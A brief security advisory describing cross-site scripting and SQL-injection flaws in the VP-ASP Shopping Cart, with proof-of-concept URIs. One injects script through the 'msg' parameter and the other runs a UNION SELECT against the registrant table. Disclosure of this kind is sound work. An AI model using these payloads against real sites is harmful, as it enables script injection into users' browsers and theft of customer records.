|
VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities
To exploit a cross-site scritping issue: An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI. The following proof-of-concept URI is available: http://example.com/[path]/shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E To exploit an SQL-injection issue: An attacker can exploit this issue via a web client. The following proof-of-concept URI is available: http://example.com/[path]/shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1 |
|
|
Privacy Statement |